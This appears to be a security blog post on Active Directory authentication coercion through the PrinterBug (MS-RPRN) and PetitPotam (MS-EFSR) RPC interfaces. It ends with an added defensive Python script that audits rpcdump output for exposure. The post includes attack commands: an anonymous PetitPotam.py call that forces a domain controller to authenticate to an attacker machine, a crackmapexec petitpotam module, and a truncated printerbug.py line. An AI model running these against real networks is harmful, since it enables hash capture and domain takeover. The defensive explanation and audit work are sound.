Within Active Directory environments, attackers use forced authentication and man-in-the-middle (MitM) techniques to carry out a range of actions. For that reason, this post opens the topic of Coerce Authentication. Across several posts we will explain the different ways to perform this technique, as well as how to chain it with other attacks to escalate privileges in a domain.
“Coerce authentication” is a technique that, through calls to Windows Remote Procedure Call (RPC) interfaces, forces a service to authenticate to a machine. Using it, an attacker can force a vulnerable server to authenticate to a machine under the attacker's control and thereby capture the machine account's NetNTLM authentication response (the NetNTLM “hash” of the machine account password).
A machine account on a Windows network is the unique identity associated with a device joined to the domain. Machine accounts are essential for authentication and communication between devices within a Windows network environment.
Once a machine account's hash has been obtained, a range of techniques becomes available to abuse that authentication and impersonate the victim. Much of the severity of this technique comes from the fact that the victim is a machine rather than a user: if it is used against a domain controller, for example, the entire domain can be compromised, which raises the criticality of the technique considerably.
What is RPC?
RPC stands for Remote Procedure Call, a form of inter-process communication (IPC) that lets applications request operations from one another, including across the network.
In Windows environments, RPC is heavily used for many different services, such as scheduling tasks, creating services, configuring printers, configuring shared resources, managing encrypted data stored remotely, among others. …
Because RPC is a remote vector, it attracts a great deal of attention from a computer security point of view.
Main Vulnerable RPCs
Below we list the main RPC interfaces known to be abusable with the “Coerce Authentication” technique.
It should be noted that exploiting these RPC interfaces requires a valid domain user account, with one exception: the interface known as MS-EFSR could be invoked without any user.
In that second case, where exploitation is anonymous, Microsoft considered it a vulnerability and released security patches to correct it; the authenticated path remains available.
MS-RPRN is the Remote Procedure Call interface for the Print System Remote Protocol.
Microsoft's Print Spooler is a service that manages print jobs and other printing-related tasks. An attacker controlling any domain user or computer account can, with a specific RPC call, trigger the spooler service on a target that runs it and make it authenticate to a host chosen by the attacker. Microsoft has marked this behaviour as “Won't Fix”, and the service is enabled by default in all Windows environments.
Command: python3 rpcdump.py @dc.corp.lab | grep 'MS-RPRN'
Command: python3 printerbug.py "CORP/bob:
Command: crackmapexec smb dc.corp.lab -M petitpotam
Command: python3 PetitPotam.py -u "" -p "" -d "" attack_machine dc.corp.lab
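As an added, defender-side example (not code from the original post, nor from the impacket or PetitPotam projects), the following Python script parses the output of the rpcdump.py command shown above and reports which of the coercion-prone interfaces discussed here, MS-RPRN (PrinterBug) and MS-EFSR (PetitPotam), a host exposes over the network, together with the mitigation for each. The rpcdump output embedded in the script is constructed to match the layout impacket prints; the hostname, addresses and ports are invented, and the interface UUIDs are the ones published in Microsoft's protocol specifications for MS-RPRN and MS-EFSR.

```python
"""Audit impacket rpcdump.py output for RPC interfaces that can be abused
for authentication coercion (MS-RPRN / PrinterBug, MS-EFSR / PetitPotam).
Added example for this post; run it on real rpcdump output by piping the
tool's stdout into find_coercion_exposure()."""
import re

# Interfaces named in the post. Tags are the labels rpcdump.py prints in
# "Protocol: [MS-XXXX]"; UUIDs come from the Microsoft protocol specs and
# are used as a fallback when rpcdump prints "Protocol: N/A".
COERCION_INTERFACES = {
    "MS-RPRN": {
        "uuids": {"12345678-1234-abcd-ef00-0123456789ab"},
        "abuse": "PrinterBug (needs any authenticated domain account)",
        "mitigation": "Stop and disable the Print Spooler service on domain "
                      "controllers and on servers that do not need to print.",
    },
    "MS-EFSR": {
        "uuids": {"c681d488-d850-11d0-8c52-00c04fd90f7e",
                  "df1941c5-fe89-4e79-bf10-463657acf44d"},
        "abuse": "PetitPotam (anonymous on unpatched hosts, "
                 "authenticated otherwise)",
        "mitigation": "Apply Microsoft's updates that close the anonymous "
                      "path and monitor the authenticated path.",
    },
}

# Constructed sample modelled on the layout of impacket rpcdump.py output.
# DC01, 10.0.0.5 and the ports are invented for this example.
SAMPLE_RPCDUMP = r"""
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:10.0.0.5[49669]
          ncalrpc:[spoolss]
          ncacn_np:\\DC01[\pipe\spoolss]

Protocol: N/A
Provider: N/A
UUID    : C681D488-D850-11D0-8C52-00C04FD90F7E v1.0
Bindings:
          ncacn_np:\\DC01[\pipe\lsarpc]

Protocol: N/A
Provider: N/A
UUID    : 00000000-0000-0000-0000-00000000dead v1.0
Bindings:
          ncalrpc:[LRPC-example]
"""


def parse_rpcdump(text):
    """Split rpcdump output into entries: protocol tag, provider, uuid, bindings."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Protocol:"):
            current = {"protocol": "N/A", "provider": "N/A",
                       "uuid": "", "bindings": []}
            entries.append(current)
            tag = re.search(r"\[([A-Z0-9-]+)\]", line)
            if tag:
                current["protocol"] = tag.group(1)
        elif current is None:
            continue                      # text before the first entry
        elif line.startswith("Provider:"):
            current["provider"] = line.split(":", 1)[1].strip()
        elif line.startswith("UUID"):
            # "UUID    : <uuid> v1.0" -> keep only the uuid, lower-cased
            current["uuid"] = line.split(":", 1)[1].strip().split()[0].lower()
        elif line.startswith("nca"):      # one binding per indented line
            current["bindings"].append(line)
    return entries


def classify(entry):
    """Return the coercion-interface tag for an entry, or None."""
    for tag, info in COERCION_INTERFACES.items():
        if entry["protocol"] == tag or entry["uuid"] in info["uuids"]:
            return tag
    return None


def remote_bindings(entry):
    """Bindings reachable over the network (TCP or named pipe), not local ncalrpc."""
    return [b for b in entry["bindings"] if not b.startswith("ncalrpc")]


def find_coercion_exposure(text):
    """Map each coercion-relevant interface to the network-reachable bindings it exposes."""
    exposure = {}
    for entry in parse_rpcdump(text):
        tag = classify(entry)
        if tag and remote_bindings(entry):
            exposure.setdefault(tag, []).extend(remote_bindings(entry))
    return exposure


if __name__ == "__main__":
    for tag, bindings in find_coercion_exposure(SAMPLE_RPCDUMP).items():
        info = COERCION_INTERFACES[tag]
        print(f"[!] {tag} reachable via {', '.join(bindings)}")
        print(f"    abuse: {info['abuse']}")
        print(f"    mitigation: {info['mitigation']}")
```

Matching on the UUID as well as on rpcdump's protocol label matters because rpcdump prints “N/A” for interfaces it does not recognise by name, and local-only `ncalrpc` bindings are dropped so that the report lists only what a remote attacker could reach.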